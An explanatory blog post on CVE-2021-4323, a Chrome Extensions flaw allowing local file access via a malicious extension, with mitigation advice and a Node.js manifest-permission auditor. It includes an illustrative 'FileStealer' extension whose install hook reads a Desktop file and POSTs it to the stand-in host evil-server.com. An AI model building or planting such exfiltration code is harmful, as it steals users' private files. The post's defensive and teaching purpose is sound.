If you use Google Chrome, you may have heard of CVE-2021-4323, a vulnerability in the Extensions component of Google Chrome that affects versions prior to 90.0.4430.72 (the Chrome 90 stable release). It is rated medium severity: an attacker who convinces a user to install a malicious extension can use the flaw to access the user's local files.

In this post we look at how this class of attack works: what "insufficient validation of untrusted input" means here, what a file-stealing extension looks like in code, and why the attacker still needs the user's cooperation. Links to the original references are included at the end so you can dig further.

What is the vulnerability?

CVE-2021-4323 is a bug in the Extensions component of Google Chrome affecting versions prior to 90.0.4430.72. NVD classifies the root cause as insufficient validation of untrusted input: the extension system accepted input from a crafted extension that it should have rejected, and the result was access to the user's local files. The attacker's only prerequisite is persuading the user to install that extension.

To better understand this, let's go through some code snippets and examples.

Code Snippet Example

A Chrome Extension declares the permissions it needs in its manifest, and the browser grants access to the corresponding APIs and hosts when the user installs it. An extension that can read local files and reach an external host could fetch a locally stored file and send it to a server the attacker controls. The "FileStealer" sketch below shows the shape of such an extension. Note that it is illustrative only: chrome.fileSystem is a Chrome Apps API that extensions cannot use, and the exact input Chrome failed to validate in CVE-2021-4323 is not described in the public advisory. The snippet shows the outcome the vulnerability made possible, not the bug itself.

FileStealer's manifest.json file

{
  "name": "FileStealer",
  "version": "1.0",
  "description": "An innocent-looking extension",
  "permissions": [
    "fileSystem",
    "https://evil-server.com/"
  ],
  "background": {
    "scripts": ["background.js"]
  },
  "manifest_version": 2
}

FileStealer's background.js file

// Runs once, right after the user installs the extension.
chrome.runtime.onInstalled.addListener(() => {
  // Illustrative only: chrome.fileSystem is a Chrome Apps API, and
  // getWritableEntry takes a FileEntry rather than a path string. A real
  // extension cannot open an arbitrary local path this way; the point is
  // what happens once a local file is readable.
  chrome.fileSystem.getWritableEntry("~/Desktop/important_file.txt", (entry) => {
    entry.file((file) => {
      const reader = new FileReader();
      reader.onloadend = () => {
        // Exfiltrate the raw bytes to the attacker-controlled host that the
        // manifest declared as a permitted origin.
        const xhr = new XMLHttpRequest();
        xhr.open('POST', 'https://evil-server.com/upload');
        xhr.send(reader.result);
      };
      reader.readAsArrayBuffer(file);
    });
  });
});

In this sketch, the user installs the FileStealer extension, which reads important_file.txt from the user's Desktop and POSTs its contents to https://evil-server.com/upload with an XMLHttpRequest. Chrome does not normally let an extension read arbitrary local paths; being able to do so anyway, through a crafted extension, is what the vulnerability's insufficient validation allowed.

Exploit Details

CVE-2021-4323 is rated medium severity rather than high because it is not triggerable remotely on its own: the attacker must first get the user to install a malicious extension. Once that has happened, the flaw gives the extension access to the user's local files.

To avoid this kind of attack, install extensions only from developers you have reason to trust, read the permission prompt before accepting it (anything matching file://, <all_urls>, or a broad host pattern deserves a second look), and review what each installed extension can already do under chrome://extensions, where per-extension toggles such as "Allow access to file URLs" live.
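As an added example (not code from the original post), here is a small Node.js script that performs the permission review described above on a parsed manifest.json. It handles both MV2, where host patterns sit inside "permissions", and MV3, where they move to "host_permissions", and it treats a content script injected on a broad pattern as equivalent to a broad host permission. The risk notes and the two sample manifests are constructed for this example; the first sample is the FileStealer manifest from this post.

```javascript
// Added example: audit a Chrome extension manifest for permissions that give
// reach into local files or into every site. Not code from the original post.
// The risk notes and the sample manifests below are constructed for illustration.

// API permissions worth a second look (assumed list, not an official one).
const RISKY_API_PERMISSIONS = {
  fileSystem: "chrome.fileSystem is a Chrome Apps API; an extension cannot use it, so the request is a mistake or bait",
  nativeMessaging: "can start and talk to a native host program outside the browser sandbox",
  debugger: "can attach to any tab and read or modify the page",
  tabs: "can read the URL and title of every open tab",
  cookies: "can read and write cookies on permitted hosts",
  history: "can read and delete browsing history",
  proxy: "can route all traffic through a proxy of its choosing",
};

// MV2 mixes host patterns into "permissions"; MV3 moves them to "host_permissions".
function looksLikeHostPattern(s) {
  return s === "<all_urls>" || /^[a-z*]+:\/\//.test(s);
}

// Classify a host match pattern; returns null when it is scoped to specific sites.
function hostPatternRisk(pattern) {
  if (pattern === "<all_urls>") {
    return "matches every URL, file:// included";
  }
  if (pattern.startsWith("file://")) {
    return "local file access; needs the user's 'Allow access to file URLs' toggle, after which any file the browser can read is reachable";
  }
  if (/^(\*|https?):\/\/\*\//.test(pattern)) {
    return "matches every site on that scheme";
  }
  return null;
}

// Returns a list of findings of the form { kind, value, reason }.
function auditManifest(manifest) {
  const findings = [];
  const apiPerms = [];
  const hostPerms = [
    ...(manifest.host_permissions || []),
    ...(manifest.optional_host_permissions || []),
  ];

  // Split MV2-style "permissions" into API names and host patterns.
  for (const p of [...(manifest.permissions || []), ...(manifest.optional_permissions || [])]) {
    (looksLikeHostPattern(p) ? hostPerms : apiPerms).push(p);
  }
  for (const p of apiPerms) {
    if (RISKY_API_PERMISSIONS[p]) {
      findings.push({ kind: "permission", value: p, reason: RISKY_API_PERMISSIONS[p] });
    }
  }
  for (const h of hostPerms) {
    const reason = hostPatternRisk(h);
    if (reason) findings.push({ kind: "host", value: h, reason });
  }
  // A content script injected on a broad pattern reads pages just like a broad host permission would.
  for (const cs of manifest.content_scripts || []) {
    for (const m of cs.matches || []) {
      const reason = hostPatternRisk(m);
      if (reason) findings.push({ kind: "content_script", value: m, reason });
    }
  }
  return findings;
}

// Constructed sample 1: the FileStealer manifest from this post (MV2).
const FILESTEALER_MANIFEST = {
  name: "FileStealer",
  version: "1.0",
  description: "An innocent-looking extension",
  permissions: ["fileSystem", "https://evil-server.com/"],
  background: { scripts: ["background.js"] },
  manifest_version: 2,
};

// Constructed sample 2: a hypothetical MV3 manifest that asks for file:// and every site.
const BROAD_MV3_MANIFEST = {
  name: "Helpful Toolbar",
  version: "2.1",
  manifest_version: 3,
  permissions: ["storage", "nativeMessaging"],
  host_permissions: ["file:///*", "<all_urls>"],
  content_scripts: [{ matches: ["*://*/*"], js: ["inject.js"] }],
};

for (const m of [FILESTEALER_MANIFEST, BROAD_MV3_MANIFEST]) {
  console.log(`${m.name}:`);
  for (const f of auditManifest(m)) {
    console.log(`  [${f.kind}] ${f.value}: ${f.reason}`);
  }
}
```

To run it against a real extension, JSON.parse the contents of its manifest.json (unpacked extensions live under the profile's Extensions directory) and pass the object to auditManifest. An empty result does not mean the extension is safe, only that none of its declared reach is broad; a narrowly scoped extension can still misuse what it has.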

References

1. Chromium Blog - New in Chrome 90
2. CVE - CVE-2021-4323 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4323)
3. National Vulnerability Database - NVD - CVE-2021-4323 (https://nvd.nist.gov/vuln/detail/CVE-2021-4323)
4. Chrome Extension Developer Guide - Extension Data Privacy

Conclusion

CVE-2021-4323, a medium severity vulnerability in the Extensions component of Google Chrome prior to version 90.0.4430.72, puts users at risk if they can be manipulated into installing a malicious extension. Understanding that the root cause was insufficient validation of untrusted input, and that a crafted extension was the vehicle, is what makes the mitigation obvious: the attacker needs your click.

By being deliberate about which extensions you install, reading their permission requests, and keeping Chrome up to date, you minimize the chance of falling victim to this and similar vulnerabilities.

Timeline

Published on: 07/29/2023 00:15:00 UTC
Last modified on: 08/02/2023 03:57:00 UTC